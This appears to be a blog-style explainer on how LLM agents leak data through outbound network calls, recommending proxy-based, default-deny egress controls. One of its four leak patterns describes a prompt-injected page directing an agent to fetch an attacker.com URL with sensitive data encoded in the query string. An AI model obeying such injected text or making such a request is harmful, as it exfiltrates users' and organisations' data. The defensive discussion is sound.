Data exfiltration, defined for the LLM era
Data exfiltration is the unauthorized transfer of data from a trusted system to an untrusted one. The textbook examples, a malicious insider with a USB stick, a compromised backup, or a misconfigured S3 bucket, assume a human or a long-lived process. LLM agents broke that assumption. An autonomous agent can exfiltrate data in seconds, in response to text it read on a webpage, using credentials it was legitimately granted.
Traditional DLP scans email attachments and Slack messages. It does not see fetch()calls from a Python agent loop. The center of gravity for data-loss prevention has moved to the agent's outbound network egress.
The four egress patterns that leak data
1. The helpful-summary leak
The agent reads internal docs, then is asked a follow-up that involves a web search. It silently includes excerpts of the internal docs in the search query. The search provider now has them. Multiply by every search call.
2. The tool-side-channel leak
The agent has a web_fetch tool. A prompt-injected page tells it to fetch https://attacker.com/?data=... with sensitive content URL-encoded into the query string. The model treats the instruction as part of its task and complies.
3. The vendor-sprawl leak
The agent chains seven SaaS APIs. Each one logs requests. PII flows to all seven. You signed a DPA with two of them.
4. The error-message leak
An exception bubbles up containing a row of customer data. The agent's error handler ships it to a third-party observability tool with no redaction.
Why prompt-side defenses are not enough
Telling the model "do not exfiltrate data" is a vibe, not a control. Fine-tuning helps at the margin. Output filtering catches the easy cases. None of these are auditable, none are testable in the way a security team needs, and all of them fail open when something in the chain breaks.
Auditable controls run on the wire. A request either matches your policy or it doesn't.
A network-layer DLP playbook for agents
- Enumerate the destinations the agent legitimately needs. Be specific. "OpenAI" is not a destination;
api.openai.comis. - Default-deny everything else. Including newly-registered lookalike domains. Especially those.
- Inspect request bodies for sensitive patterns. Customer IDs, API keys, PII, and the kind of free-text that looks like an internal doc. Redact or block.
- Require approval for new destinations. If the agent reasons its way into needing a new domain, that's a human-in-the-loop moment, not an auto-approve.
- Log everything with reasoning context. Not just "POST to X." Also "the agent was working on task Y and chose to call X because of Z."
Where this lives in your stack
The right place is a forward proxy the agent's HTTP client trusts. Drop it in via HTTPS_PROXY, an SDK config, or a sidecar no application code changes. The proxy terminates TLS, applies policy, and either forwards, rewrites, or denies. Your model code stays the same. Your egress posture goes from "trust the prompt" to "trust the policy."
Data exfiltration is the easiest agent failure mode to ignore until it shows up in a postmortem. It is also the easiest to prevent with a control that lives in the one place the model can't argue with: the network.